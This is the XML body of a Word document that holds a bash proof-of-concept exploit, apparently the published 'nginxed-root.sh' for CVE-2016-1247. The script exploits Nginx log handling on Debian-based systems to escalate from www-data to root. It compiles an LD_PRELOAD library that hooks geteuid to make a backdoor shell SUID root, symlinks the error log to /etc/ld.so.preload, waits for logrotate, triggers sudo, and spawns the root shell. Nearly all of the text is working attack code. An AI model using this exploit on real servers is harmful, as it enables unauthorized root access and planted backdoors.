        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="010EFE33"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function ctrl_c() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="373A98E9"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xml:space="preserve">        echo -e "\n[+] Ctrl+C pressed"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E08E6D4"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ab/>
        <w:t>cleanexit 0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168C4390"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E08980C" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4ABDC8B2"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xml:space="preserve">#intro </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC92150" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="580FF34C"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cat &lt;&lt;_eascii_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F5808D"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xml:space="preserve"> _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4351882D"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lt; Is your server (N)jinxed ? ;o &gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29E1F001"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xml:space="preserve"> -------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC11F0B"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xml:space="preserve">           \ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD0CA2E"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xml:space="preserve">            \          __---__</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56E910BD"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xml:space="preserve">                    _-       /--______</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46340E2F"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xml:space="preserve">               __--( /     \ )XXXXXXXXXXX\v.  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5610EDA6"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xml:space="preserve">             .-XXX(   O   O  )XXXXXXXXXXXXXXX- </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6279EB92"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xml:space="preserve">            /XXX(       U     )        XXXXXXX\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4F19F3"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xml:space="preserve">          /XXXXX(              )--_  XXXXXXXXXXX\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47A37E48"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xml:space="preserve">         /XXXXX/ (      O     )   XXXXXX   \XXXXX\ </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6630657F"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xml:space="preserve">         XXXXX/   /            XXXXXX   \__ \XXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B2B511"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xml:space="preserve">         XXXXXX__/          XXXXXX         \__----&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D937A7"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xml:space="preserve"> ---___  XXX__/          XXXXXX      \__         /</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3338B96A"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xml:space="preserve">   \-  --__/   ___/\  XXXXXX            /  ___--/=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="222DF6BE"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xml:space="preserve">    \-\    ___/    XXXXXX              '--- XXXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="585FABB1"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xml:space="preserve">       \-\/XXX\ XXXXXX                      /XXXXX</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694A88E1"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xml:space="preserve">         \XXXXXXXXX   \                    /XXXXX/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B7208EF"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xml:space="preserve">          \XXXXXX      &gt;                 _/XXXXX/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10CDB9EE"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xml:space="preserve">            \XXXXX--__/              __-- XXXX/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6291BD"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xml:space="preserve">             -XXXXXXXX---------------  XXXXXX-</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="437DD4EE"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xml:space="preserve">                \XXXXXXXXXXXXXXXXXXXXXXXXXX/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D5E7D0F"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xml:space="preserve">                  ""VXXXXXXXXXXXXXXXXXXV""</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CF0970B"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_eascii_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DF5EBA" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38420EB1"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echo -e "\033[94m \nNginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247) \nnginxed-root.sh (ver. 1.0)\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="593A5F5C"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echo -e "Discovered and coded by: \n\nDawid Golunski \n</w:t>
      </w:r>
      <w:hyperlink r:id="rId35" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>https://legalhackers.com</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> \033[0m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F693C11" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="73322460"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Args</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AA6CA9"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if [ $# -lt 1 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56177DEA"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ab/>
        <w:t>echo -e "\n[!] Exploit usage: \n\n$0 path_to_error.log \n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E4650C6"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ab/>
        <w:t>echo -e "It seems that this server uses: `ps aux | grep nginx | awk -F'log-error=' '{ print $2 }' | cut -d' ' -f1 | grep '/'`\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A95A2CE"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ab/>
        <w:t>exit 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6993A1BC"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB08E86" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="135893BB"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Priv check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="482839BC" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A3BC21B"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echo -e "\n[+] Starting the exploit as: \n\033[94m`id`\033[0m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7192535B"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id | grep -q www-data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1594CA30"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if [ $? -ne 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="081D5E4B"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ab/>
        <w:t>echo -e "\n[!] You need to execute the exploit as www-data user! Exiting.\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69B72854"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ab/>
        <w:t>exit 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32930A7D"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E062D6F" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5E09D4DD"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Set target paths</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A37FE73"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ERRORLOG="$1"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1129454A"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if [ ! -f $ERRORLOG ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7753F49B"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ab/>
        <w:t>echo -e "\n[!] The specified Nginx error log ($ERRORLOG) doesn't exist. Try again.\n"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADBDE82"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ab/>
        <w:t>exit 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FF41957"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="227CD8AD" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A9135EC"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 Exploitation ]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FCE66BE" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C484FDA"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trap ctrl_c INT</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2C4D51"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Compile privesc preload library</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779EDE36"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echo -e "\n[+] Compiling the privesc shared library ($PRIVESCSRC)"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BFA9E4"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cat &lt;&lt;_solibeof_&gt;$PRIVESCSRC</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E5556F"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define _GNU_SOURCE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="640B79B6"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include &lt;stdio.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274914A9"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include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39AA4D32"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include &lt;unistd.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55603AAC"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include &lt;dlfcn.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B7CB92"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xml:space="preserve">       #include &lt;sys/types.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1109A03F"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xml:space="preserve">       #include &lt;sys/stat.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39553C32"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xml:space="preserve">       #include &lt;fcntl.h&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15F3238E" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2BA7CCD0"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uid_t geteuid(void) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F691350"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ab/>
        <w:t>static uid_t  (*old_geteuid)();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D16D667"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ab/>
        <w:t>old_geteuid = dlsym(RTLD_NEXT, "geteuid");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502C0E4D"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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>if ( old_geteuid() == 0 ) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452D747E"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>chown("$BACKDOORPATH", 0, 0);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDADB6A"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>chmod("$BACKDOORPATH", 04777);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="162062F4"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>unlink("/etc/ld.so.preload");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7380DE6A"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ab/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E1760E"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ab/>
        <w:t>return old_geteuid();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="317AC024"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D2A02BD"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_solibeof_</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB7E872"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bin/bash -c "gcc -Wall -fPIC -shared -o $PRIVESCLIB $PRIVESCSRC -ldl"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D5D4AD0"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if [ $? -ne 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F0BC887"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ab/>
        <w:t>echo -e "\n[!] Failed to compile the privesc lib $PRIVESCSRC."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3218E160"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ab/>
        <w:t>cleanexit 2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F8ADCF0"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D4AE4D1" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D38E2B2" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A5D860D"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Prepare backdoor shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50EC9430"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cp $BACKDOORSH $BACKDOORPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EFDCBC2"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echo -e "\n[+] Backdoor/low-priv shell installed at: \n`ls -l $BACKDOORPATH`"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097E8E8C" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="572F45C2"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Safety check</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B940675"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if [ -f /etc/ld.so.preload ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C88E53"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ab/>
        <w:t>echo -e "\n[!] /etc/ld.so.preload already exists. Exiting for safety."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1108B523"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ab/>
        <w:t>exit 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1619AEEC"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="725857D7" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="422ED794"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Symlink the log file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A112801"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rm -f $ERRORLOG &amp;&amp; ln -s /etc/ld.so.preload $ERRORLOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F385CAC"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if [ $? -ne 0 ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5047EFB3"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ab/>
        <w:t>echo -e "\n[!] Couldn't remove the $ERRORLOG file or create a symlink."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C38F39"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ab/>
        <w:t>cleanexit 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="535A7ECF"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51BFA3D7"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echo -e "\n[+] The server appears to be \033[94m(N)jinxed\033[0m (writable logdir) ! :) Symlink created at: \n`ls -l $ERRORLOG`"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FFD4460" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7234E579"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Make sure the nginx access.log contains at least 1 line for the logrotation to get triggered</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7254418C"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xml:space="preserve">curl </w:t>
      </w:r>
      <w:hyperlink r:id="rId36" w:history="1">
        <w:r w:rsidRPr="002B24A4">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://localhost/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;/dev/null 2&gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25639BF6"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xml:space="preserve"># Wait for Nginx to re-open the logs/USR1 signal after the logrotation (if daily </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7962E8D5"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rotation is enable in logrotate config for nginx, this should happen within 24h at 6:25am)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="628B239F"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echo -ne "\n[+] Waiting for Nginx service to be restarted (-USR1) by logrotate called from cron.daily at 6:25am..."</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE26880"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xml:space="preserve">while :; do </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ECFB2E5"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ab/>
        <w:t>sleep 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210EBE1B"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ab/>
        <w:t>if [ -f /etc/ld.so.preload ]; then</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D9FCD27"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>echo $PRIVESCLIB &gt; /etc/ld.so.preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068E259E"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>rm -f $ERRORLOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1645C6B6"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ab/>
      </w:r>
      <w:r w:rsidRPr="002B24A4">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>break;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DE50352"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lastRenderedPageBreak/>
        <w:tab/>
        <w:t>fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25BD140B"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done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61B6A6C3" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="37286C98"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etc/ld.so.preload should be owned by www-data user at this point</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24DAD052"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Inject the privesc.so shared library to escalate privileges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7976B01A"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echo $PRIVESCLIB &gt; /etc/ld.so.preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594EDF3D"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echo -e "\n[+] Nginx restarted. The /etc/ld.so.preload file got created with web server privileges: \n`ls -l /etc/ld.so.preload`"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D7027F"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echo -e "\n[+] Adding $PRIVESCLIB shared lib to /etc/ld.so.preload"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7087AC15"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echo -e "\n[+] The /etc/ld.so.preload file now contains: \n`cat /etc/ld.so.preload`"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FE19BB0"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chmod 755 /etc/ld.so.preload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1E84BB" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06D6D2F4"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Escalating privileges via the SUID binary (e.g. /usr/bin/sudo)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A678605"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echo -e "\n[+] Escalating privileges via the $SUIDBIN SUID binary to get root!"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="708D7489"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sudo 2&gt;/dev/null &gt;/dev/null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBC9C62" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47C85C1A"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Check for the rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C823F10"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ls -l $BACKDOORPATH</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBA3F0C"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ls -l $BACKDOORPATH | grep rws | grep -q root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1311A17A"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xml:space="preserve">if [ $? -eq 0 ]; then </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="266C914D"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ab/>
        <w:t>echo -e "\n[+] Rootshell got assigned root SUID perms at: \n`ls -l $BACKDOORPATH`"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0EF17E"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ab/>
        <w:t>echo -e "\n\033[94mThe server is (N)jinxed ! ;) Got root via Nginx!\033[0m"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E53434C"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else</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4969E4"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ab/>
        <w:t>echo -e "\n[!] Failed to get root"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A701AE8"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ab/>
        <w:t>cleanexit 2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C51044"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fi</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180E06AD" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6D22EBFE"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rm -f $ERRORLOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FC4649C"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echo &gt; $ERRORLOG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C549FE5"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xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3586EB55"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Use the rootshell to perform cleanup that requires root privilges</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13FEFF3D"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BACKDOORPATH -p -c "rm -f /etc/ld.so.preload; rm -f $PRIVESCLIB"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38927518"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Reset the logging to error.log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65A2DA74"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BACKDOORPATH -p -c "kill -USR1 `pidof -s nginx`"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A391F2" w14:textId="77777777" w:rsidR="000D228D" w:rsidRPr="002B24A4" w:rsidRDefault="000D228D" w:rsidP="000D228D">
      <w:pPr>
        <w:pStyle w:val="HTMLPreformatted"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2522C9C8"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Execute the rootshell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42A3C177"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echo -e "\n[+] Spawning the rootshell $BACKDOORPATH now! \n"</w:t>
      </w:r>
    </w:p>
